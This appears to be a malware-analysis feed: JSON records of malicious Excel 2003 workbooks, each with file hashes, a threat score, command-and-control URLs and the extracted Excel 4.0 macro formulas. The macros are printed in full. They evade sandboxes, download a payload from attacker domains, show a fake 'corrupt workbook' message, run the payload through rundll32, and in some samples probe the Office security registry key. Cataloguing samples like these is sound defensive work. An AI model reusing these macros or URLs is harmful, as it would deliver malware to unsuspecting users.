{"version":"0.2","sample":{"sample":"","kind":"file","target":"b1f7601795fb7077156cbd782e38f108aa9121ab5b84a42c9139637c3c1b31d8"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b1f7601795fb7077156cbd782e38f108aa9121ab5b84a42c9139637c3c1b31d8","filesize":152576,"md5":"5df4a844e603db83094e0f50987e4b07","sha1":"44f5210534b1b4fb28f80405dd1ca5865aef4d39","sha256":"b1f7601795fb7077156cbd782e38f108aa9121ab5b84a42c9139637c3c1b31d8","sha512":"68f68c31d484198e417a947d567cc70d38517b736c35df95b340a758daab365f8995313ac36bc98bec18103b258e3e45b54466f046047ebdffbdf91bb64982ca","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b1f7601795fb7077156cbd782e38f108aa9121ab5b84a42c9139637c3c1b31d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kgASSNATBC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b20dd0c531da6c6958786d761f51b5161332692e670aea66b9c4ff32824ce364"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b20dd0c531da6c6958786d761f51b5161332692e670aea66b9c4ff32824ce364","filesize":113664,"md5":"9b8095e54176900f9b8a7dbadba38a73","sha1":"cc8955a5d2cf2a2f72e65ba45dcf3611a5411e88","sha256":"b20dd0c531da6c6958786d761f51b5161332692e670aea66b9c4ff32824ce364","sha512":"c2f2e223eb20e3379e9b6d965b3e0636d6ecb886d60b32a3f83ab5a466e9b2a3f056cb88dca8efc7620fb687f42269c1445c5691b20c9d58950767d8c59bade8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b20dd0c531da6c6958786d761f51b5161332692e670aea66b9c4ff32824ce364.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y0zf3bCyYi\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2154c0912b963d983b272db2781321e44303f1d8de969e8776a78812650c5be"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b2154c0912b963d983b272db2781321e44303f1d8de969e8776a78812650c5be","filesize":185344,"md5":"a6dadf7959566c7ee2f707320a365f7f","sha1":"3300cc780462d4d18d18d1c84bda0da40e418027","sha256":"b2154c0912b963d983b272db2781321e44303f1d8de969e8776a78812650c5be","sha512":"6a4479c2ccd286df4a73733aac2222959bbb5951199416a11d7043e1876af632c5ce631ceebce8c8a8f4a1e724c9120bbe9cfb58b29fb059f99ae2ae3edd975b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2154c0912b963d983b272db2781321e44303f1d8de969e8776a78812650c5be.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b215a45f6d27f1572886bbd6bafc613a34fee3b6c1248a9009725697acadcc49"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b215a45f6d27f1572886bbd6bafc613a34fee3b6c1248a9009725697acadcc49","filesize":146944,"md5":"f64ed309adc7e0be9672563b4ede078f","sha1":"6b45f08645e4b8e54944059c0dc9c55e1c3e842e","sha256":"b215a45f6d27f1572886bbd6bafc613a34fee3b6c1248a9009725697acadcc49","sha512":"f6cc55a70ff5b9cae09a8513cfc03c049849371b297a162f9d16227e7410dfc8743aedcde4a23982dde16be2962cfdc86351a8a1e7e07b3685231beb5356019e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b215a45f6d27f1572886bbd6bafc613a34fee3b6c1248a9009725697acadcc49.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"BqhpxB3gkJ\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b215d9276c9f3d06aa6ce3515ae9a025db35410e3186ff2e69446b826976af54"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b215d9276c9f3d06aa6ce3515ae9a025db35410e3186ff2e69446b826976af54","filesize":168960,"md5":"63dcb1b3ff17f229fc0be92f67e913eb","sha1":"a8f6b7955e9fbc30d418fea58d22427e6bf5b55a","sha256":"b215d9276c9f3d06aa6ce3515ae9a025db35410e3186ff2e69446b826976af54","sha512":"3bde47728724c8db45ff6e536f177a4245a3696e38addfd68ccb946ecb0981a4e95923a805933ab513c4fee3068a0d23ec2a1090f8aaebefff9501c832d22f4a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b215d9276c9f3d06aa6ce3515ae9a025db35410e3186ff2e69446b826976af54.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kZ2KEskC5J\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2199247173de8849ddc6ff3c8a88e4a1bba8c3486f3f9b7bf7bb5b112442323"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b2199247173de8849ddc6ff3c8a88e4a1bba8c3486f3f9b7bf7bb5b112442323","filesize":104448,"md5":"c89803586c91400f4eaaf301f3cb78c9","sha1":"f6835fad777a66df0f9052a76074828385dc9c5f","sha256":"b2199247173de8849ddc6ff3c8a88e4a1bba8c3486f3f9b7bf7bb5b112442323","sha512":"5e97446a781ab97939fb94bcad634f6cd2cdfdcfe9103993583469b23c5fbffbbc2d42e967f82ec00ad1019589e4863a22c8392c09b13d36880f4c800b1777c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2199247173de8849ddc6ff3c8a88e4a1bba8c3486f3f9b7bf7bb5b112442323.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"ZRcXkCgqTG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b22cacfcc804af7edf8eac28160b31b2be9e4bdb80a0c2d71576e589166c030a"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b22cacfcc804af7edf8eac28160b31b2be9e4bdb80a0c2d71576e589166c030a","filesize":209920,"md5":"a7087aa7e311ed49e6d51bbfebb752e6","sha1":"ce3dd567718fb720ec18d78dce3f2e29d77eafd4","sha256":"b22cacfcc804af7edf8eac28160b31b2be9e4bdb80a0c2d71576e589166c030a","sha512":"4c53b47b47ee86c966fbb15ffbef0158e3c8698d6104ad51cc434d4ad5f320c657801c0045b20cdb12d7935cc165420157e93c42285b8adb6b17daac237dba1c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b22cacfcc804af7edf8eac28160b31b2be9e4bdb80a0c2d71576e589166c030a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"0UUda6ws2G\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b22e2b496831e23ebec55d8408ef2c21e65785c6b8122b3dbe747b531eef7f1a"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b22e2b496831e23ebec55d8408ef2c21e65785c6b8122b3dbe747b531eef7f1a","filesize":112128,"md5":"9709d949d727d4d5e2104c6654ec764e","sha1":"7285cc7def394da3ddfada6d0b7d4470ae54af6a","sha256":"b22e2b496831e23ebec55d8408ef2c21e65785c6b8122b3dbe747b531eef7f1a","sha512":"a8f4ce15c8622709d3492ab4e3c1f4f7a4197d8b3911b1deb8788bcf2c0f45c6f8c66a6dec85029d342906ea5948c77458f2a60b31cfbbb37dfade499db60f96","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b22e2b496831e23ebec55d8408ef2c21e65785c6b8122b3dbe747b531eef7f1a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2306a070f989078a4d72eff3bf7cc4f283cbfe151f73b53536d77a0078fae10"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b2306a070f989078a4d72eff3bf7cc4f283cbfe151f73b53536d77a0078fae10","filesize":144384,"md5":"9b3e2de78248e0a1c9edebef465d08f8","sha1":"c78299c8def7b60b33254d1680b43b2e7eed57ed","sha256":"b2306a070f989078a4d72eff3bf7cc4f283cbfe151f73b53536d77a0078fae10","sha512":"889cab28c959435fae2579b870e26e426338fbf22e2df0af3efc458afa6a9b0a0b565be78067258cb4b98364efbad1ae3059ebf61aec73b73f9b21360f56a482","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2306a070f989078a4d72eff3bf7cc4f283cbfe151f73b53536d77a0078fae10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"SPgQQ7Qxvi\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b24f5eb0b3dd900ab2e9bca1e2a6f09a312528cd20f5d3d846abc1d73f8c4399"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b24f5eb0b3dd900ab2e9bca1e2a6f09a312528cd20f5d3d846abc1d73f8c4399","filesize":177152,"md5":"22d70bc7d9c43eed2140011a6a9417d7","sha1":"ae89ba6e6f309e4dd084ad9a8f8044b228adb641","sha256":"b24f5eb0b3dd900ab2e9bca1e2a6f09a312528cd20f5d3d846abc1d73f8c4399","sha512":"d705667da36f24c1d81113336f00a299364c6b7e86a939c9f9f6cbe72b319796f5cb3ae3352d1928a8af20d41f7efa7c0ec95ceebf310a9407d52411630fb28c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b24f5eb0b3dd900ab2e9bca1e2a6f09a312528cd20f5d3d846abc1d73f8c4399.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Kx3Qu7pQwA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b273a0d289f5f79a0367c9d7ad69b2b6417c7bf8bbf4f2e07127f6b2897e089e"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b273a0d289f5f79a0367c9d7ad69b2b6417c7bf8bbf4f2e07127f6b2897e089e","filesize":104448,"md5":"908e1a72928f062e192b6d35a5a9de42","sha1":"6b8ea268cdf55fbf64cb06f93f3a4a0f6fd40a21","sha256":"b273a0d289f5f79a0367c9d7ad69b2b6417c7bf8bbf4f2e07127f6b2897e089e","sha512":"6f04645c6a12ec164349623c796921ca3da7c1b6278851c284416bd007a69095a9225eaa9f8c31ccbf1dd94973ba175216e3c24b2d5a9b316bc7baf4c44abd4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b273a0d289f5f79a0367c9d7ad69b2b6417c7bf8bbf4f2e07127f6b2897e089e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Oh5y8z7uNG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b275b5686302b227594963815d9f2294553a4009cec208729d8d7a69fab26e26"},"analysis":{"reported":"2020-04-09T16:18:24Z","score":10},"files":[{"filename":"b275b5686302b227594963815d9f2294553a4009cec208729d8d7a69fab26e26","filesize":170496,"md5":"39c091591d49f99e16f68323d3d9ba2f","sha1":"ab12467424ac7a2da09beb8371b1601120fe03e7","sha256":"b275b5686302b227594963815d9f2294553a4009cec208729d8d7a69fab26e26","sha512":"f6eb360783ded62d9a616f725471980c00909d6499fbbcfea3d08c9be75f47c3c644e9fbf8d34f25774a0857ad716f13935cb29cbdb196549c7155c6ee05b316","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b275b5686302b227594963815d9f2294553a4009cec208729d8d7a69fab26e26.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"pC4I4XU3UE\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b27bad52a6c5b61c80468d443498b07892a92319674a4b39adfe3fcb59e5e3e4"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b27bad52a6c5b61c80468d443498b07892a92319674a4b39adfe3fcb59e5e3e4","filesize":168960,"md5":"a54d4e4d81c472aff6ce457db3047a4e","sha1":"f1685e182448d098d9124126c251493fd846a937","sha256":"b27bad52a6c5b61c80468d443498b07892a92319674a4b39adfe3fcb59e5e3e4","sha512":"0ad4b2c8310802093c49fa4ff6b11d24ede8579063dbb6f011c702b440239774f3aa46db69bf57526947ca735585cfbadce50a36b773f5dc4fc5a40292aa2400","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b27bad52a6c5b61c80468d443498b07892a92319674a4b39adfe3fcb59e5e3e4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ml5imQR4av\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2af8f8d927f7b7290c45f12bac15423f68e8b5ec88cd1731a87a0647e7e456b"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2af8f8d927f7b7290c45f12bac15423f68e8b5ec88cd1731a87a0647e7e456b","filesize":116224,"md5":"c66d6e33f6c7ecfd35dc00809180d906","sha1":"1af89dd6495ed4753bcaf703f79c943d82a900a9","sha256":"b2af8f8d927f7b7290c45f12bac15423f68e8b5ec88cd1731a87a0647e7e456b","sha512":"a0642c08f5d361777d81ac5da9d2250a326690bc8cc374cc5101fe771b9b70a59b0fe9d0f9415a93145011a4b47e1acae3cab72bec824878a37b7f8765e889db","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2af8f8d927f7b7290c45f12bac15423f68e8b5ec88cd1731a87a0647e7e456b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SPxHpYs5zK\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2ba5a9e91f78b23cc52ab5dd55e30b67042db45bc281b2555f870edb0e23d06"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2ba5a9e91f78b23cc52ab5dd55e30b67042db45bc281b2555f870edb0e23d06","filesize":206336,"md5":"2eb40cc4760b2b9d4b8a7b25ff81fa31","sha1":"a19c5cf7c65e13f2c243ac0da28c8912fb1d08e8","sha256":"b2ba5a9e91f78b23cc52ab5dd55e30b67042db45bc281b2555f870edb0e23d06","sha512":"a06a62494f7c3e87bec54f20e0f9aced8ea46454c6583ee0a6985e7df2c4125fccfee4ff21439dcd61b7dddf676d28b1916cbe602279faf8bce55f51c52007b5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2ba5a9e91f78b23cc52ab5dd55e30b67042db45bc281b2555f870edb0e23d06.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7ppTjGARVB\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2ca7cd44d316ee2463dd0b54185020afb4d9ead8e4a871c2943c92c232c23eb"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2ca7cd44d316ee2463dd0b54185020afb4d9ead8e4a871c2943c92c232c23eb","filesize":170496,"md5":"e6b557506aeb2d51375e027c00634027","sha1":"b4113475842878a9aba650f762708688b823e378","sha256":"b2ca7cd44d316ee2463dd0b54185020afb4d9ead8e4a871c2943c92c232c23eb","sha512":"44e68155b13c059375d705331d01ca02ae7f4c482dcd9dbecbe59849ff366bac82c3cde37d4454ada7882379a71b3c8098b40e59ca7d011c763e5d511d2db469","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2ca7cd44d316ee2463dd0b54185020afb4d9ead8e4a871c2943c92c232c23eb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"g4tv1VR0hL\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b2d4b2c0991c2bb244dad76400738077916c4ce0c333892a050dd0a1ab17c772"},"analysis":{"reported":"2020-04-09T16:18:25Z","score":10},"files":[{"filename":"b2d4b2c0991c2bb244dad76400738077916c4ce0c333892a050dd0a1ab17c772","filesize":132608,"md5":"a669479243b056bc7af2ed88e11c223a","sha1":"a695fa3b5e4bcc93ab18aff02b4c5b941f5a9482","sha256":"b2d4b2c0991c2bb244dad76400738077916c4ce0c333892a050dd0a1ab17c772","sha512":"b3bdea20901ed30c8cddd8f23bdfdf09bf70f2ce5451edbbff34a21033bf971f76179307a534ac05fada4ec76bed38a8a833fa342b57a856e831cf80467ceaa2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b2d4b2c0991c2bb244dad76400738077916c4ce0c333892a050dd0a1ab17c772.xls"}],"unpack_count":0,"error_count":0,"e